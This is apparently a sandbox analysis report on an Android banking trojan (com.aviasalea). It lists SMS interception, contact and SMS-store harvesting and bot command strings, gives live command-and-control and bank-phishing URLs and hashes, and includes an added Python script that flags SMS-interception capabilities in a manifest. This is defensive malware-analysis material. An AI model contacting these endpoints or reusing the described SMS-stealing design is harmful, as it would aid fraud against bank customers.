Source: submitted apk | Request permission: android.permission.READ_PHONE_STATE
Has permission to receive SMS in the background
Source: submitted apk | Request permission: android.permission.RECEIVE_SMS
Monitors incoming phone calls
Source: com.aviasalea.rcs.RestartService | Registered receiver: android.intent.action.PHONE_STATE
Monitors incoming SMS
Source: com.aviasalea.mess.service.receiver.SmsReceiver | Registered receiver: android.provider.Telephony.SMS_RECEIVED
Queries SMS data
Source: com.aviasalea.srs.api.requests.RegistrationReportStep4Request;->getHttpParams:18 | API Call: android.net.Uri.parse("content://sms/inbox")
Source: com.aviasalea.srs.api.requests.RegistrationReportStep5Request;->getHttpParams:16 | API Call: android.net.Uri.parse("content://sms/sent")
Queries a list of installed applications
Source: com.aviasalea.checktls.CmndTls;->getAllInstalledApkInfo:21 | API Call: android.content.pm.PackageManager.queryIntentActivities
Queries contact email addresses
Source: com.aviasalea.checktls.CntctsTls;->doInBackground:52 | Field access: android.provider.ContactsContract$CommonDataKinds$Email.CONTENT_URI
Queries phone contact information
Source: com.aviasalea.checktls.CmndTls$3;->run:19 | Field access: android.provider.ContactsContract$CommonDataKinds$Phone.CONTENT_URI
Source: com.aviasalea.checktls.CntctsTls;->doInBackground:61 | Field access: android.provider.ContactsContract$CommonDataKinds$Phone.CONTENT_URI
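The permission and receiver findings above are all static: they come from the manifest, not from running the app. The Python below is an added example, not Joe Sandbox code and not the sample's code, that triages a manifest for the same permission-plus-receiver combinations and, going one step beyond the report, flags SMS receivers declared with a high android:priority. The manifest is constructed from the report's findings: the three permissions, the two receiver classes and their actions are the ones listed; the INTERNET permission, the android:priority value and the capability names are assumptions.

```python
"""Triage an AndroidManifest.xml for SMS and telephony capabilities.

Added example, not Joe Sandbox or sample code.
"""
from __future__ import annotations

import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A = "{%s}" % ANDROID_NS   # ElementTree's Clark notation for android: attributes

# Constructed manifest. Permissions, receiver classes and actions are those the
# report lists; INTERNET and the android:priority value are assumptions.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.aviasalea">
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application>
    <receiver android:name="com.aviasalea.mess.service.receiver.SmsReceiver">
      <intent-filter android:priority="999">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
    <receiver android:name="com.aviasalea.rcs.RestartService">
      <intent-filter>
        <action android:name="android.intent.action.PHONE_STATE"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# A rule fires only when every listed permission is requested AND every listed
# action has a registered receiver. The capability names are this example's own.
RULES = {
    "sms-interception": {
        "permissions": {"android.permission.RECEIVE_SMS"},
        "actions": {"android.provider.Telephony.SMS_RECEIVED"},
    },
    "sms-store-exfiltration": {
        "permissions": {"android.permission.READ_SMS", "android.permission.INTERNET"},
        "actions": set(),
    },
    "call-monitoring": {
        "permissions": {"android.permission.READ_PHONE_STATE"},
        "actions": {"android.intent.action.PHONE_STATE"},
    },
}


def parse_manifest(xml_text: str):
    """Return (permissions, receiver -> actions, receiver -> max priority)."""
    root = ET.fromstring(xml_text)
    permissions = {e.get(A + "name") for e in root.iter("uses-permission")}
    receivers: dict[str, set[str]] = {}
    priorities: dict[str, int] = {}
    for rcv in root.iter("receiver"):
        name = rcv.get(A + "name")
        receivers[name] = {a.get(A + "name") for a in rcv.iter("action")}
        priorities[name] = max(
            (int(f.get(A + "priority", "0")) for f in rcv.iter("intent-filter")),
            default=0,
        )
    return permissions, receivers, priorities


def triage(xml_text: str) -> dict[str, list[str]]:
    """Map each matched capability to the receivers implementing its actions."""
    permissions, receivers, _ = parse_manifest(xml_text)
    registered = set().union(*receivers.values())
    hits: dict[str, list[str]] = {}
    for rule, need in RULES.items():
        if need["permissions"] <= permissions and need["actions"] <= registered:
            hits[rule] = sorted(n for n, acts in receivers.items() if acts & need["actions"])
    return hits


def high_priority_sms_receivers(xml_text: str, threshold: int = 100) -> list[str]:
    """SMS_RECEIVED receivers whose priority exceeds threshold. Before Android
    4.4 such a receiver saw (and could abort) the broadcast ahead of the SMS app."""
    _, receivers, priorities = parse_manifest(xml_text)
    return sorted(
        n for n, acts in receivers.items()
        if "android.provider.Telephony.SMS_RECEIVED" in acts and priorities[n] > threshold
    )


if __name__ == "__main__":
    for rule, rcvs in triage(SAMPLE_MANIFEST).items():
        print(f"{rule}: {', '.join(rcvs) or '(permissions only)'}")
    print("high-priority SMS receivers:", high_priority_sms_receivers(SAMPLE_MANIFEST))
```

Manifests inside a real APK are binary XML; run the file through apktool or androguard's AXML parser first, then feed the decoded text to parse_manifest.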

Remote Access Functionality:

Found parser code for incoming SMS (may be used to act on incoming SMS, BOT)
Source: com.aviasalea.mess.service.receiver.SmsReceiver;->onReceive:17 | API Call: java.lang.String.equals android.provider.Telephony.SMS_RECEIVED
Found suspicious command strings (may be related to BOT commands)
Source: Lcom/aviasalea/srs/CmndSrs;->sendSMSReportToServer(J)V | Method string: "send_sms"
Source: Lcom/aviasalea/srs/CmndSrs;->parseStartAccessEnd(Lcom/aviasalea/srs/api/responses/StatusResponse;)V | Instruction: "lcom/aviasalea/srs/cmndsrs;->sendstartaccessendtoserver(j)v"
Source: Lcom/aviasalea/checktls/CmndTls;->getPhoneIMEINumber(Landroid/content/Context;)Ljava/lang/String; | Instruction: "landroid/telephony/telephonymanager;->getimei()ljava/lang/string;"
Source: Lcom/aviasalea/srs/CmndSrs;->parseSendSmsStatusEnd(Lcom/aviasalea/srs/api/responses/StatusResponse;)V | Instruction: "lcom/aviasalea/srs/cmndsrs;->sendsmsstatusendtoserver(j)v"
Source: Lcom/aviasalea/srs/CmndSrs;->sendSMSReportToServer(J)V | Instruction: "const-string v3, "send_sms""

Antivirus and Machine Learning Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Screenshots

Created / dropped Files

No created / dropped files found

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://185.212.128.192/1324273/report.php | true | | unknown
http://185.212.128.192/1324273/gate.php?ID=450785365059857103&screen=on | true | | unknown
http://185.212.128.192/favicon.ico | true | | unknown
http://185.212.128.192/1324273/bee/avia/index1.php?ID=450785365059857103 | true | | unknown

          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://185.212.128.192/1324273/ | librealtalk-jni.so | true | | unknown
http://185.212.128.192/1324273/bee/avia/index1.php | librealtalk-jni.so | false | | unknown
http://185.212.128.192/1324273/gate.php | android | true | | unknown
http://185.212.128.192/1324273/bee/tin/index.php | android | false | | unknown
http://schemas.android.com/apk/res/android | notification_template_icon_group.xml, service_conf.xml, payment_ic_visa.xml, ntivu.xml, notification_media_action.xml, keyboard_view.xml, notification_template_part_time.xml, payment_ic_amex.xml, AndroidManifest.xml | false | | high
http://185.212.128.192/1324273/bee/homecredit/index.php | android | false | | unknown
http://185.212.128.192/1324273/bee/avia/index1.phpru.berbankmobilecom.android.settings.DeviceAdminAd | librealtalk-jni.so | false | | unknown
http://185.212.128.192/1324273/bee/alfa/index.php | android | false | | unknown
http://185.212.128.192/1324273/bee/open/index.php | android | false | | unknown
http://185.212.128.192/1324273/bee/rus/index.php | android | false | | unknown
http://schemas.android.com/apk/res-auto | sber_login.xml | false | | high
http://le22999a.pw/1324273/ | librealtalk-jni.so | false | | unknown
http://185.212.128.192/1324273/http://le22999a.pw/1324273/start_accessdisable_sdef_sms_cl_packagepsu | librealtalk-jni.so | false | | unknown
http://185.212.128.192/1324273/bee/vtb.php | android | false | | unknown

                                      Contacted IPs

                                      Public

IP | Country | ASN | ASN Name | Malicious
74.125.140.188 | United States | 15169 | unknown | false
185.212.128.192 | Germany | 200313 | unknown | true

                                      Static File Info

                                      General

File type: Zip archive data
Entropy (8bit): 7.911695777595332
TrID:
• Android Package (19004/1) 46.91%
• Java Archive (13504/1) 33.34%
• ZIP compressed archive (8000/1) 19.75%
File name: wBBPLjgyoW
File size: 1016370
MD5: 2f07c9b2a67104f8bc08d831c8922b6a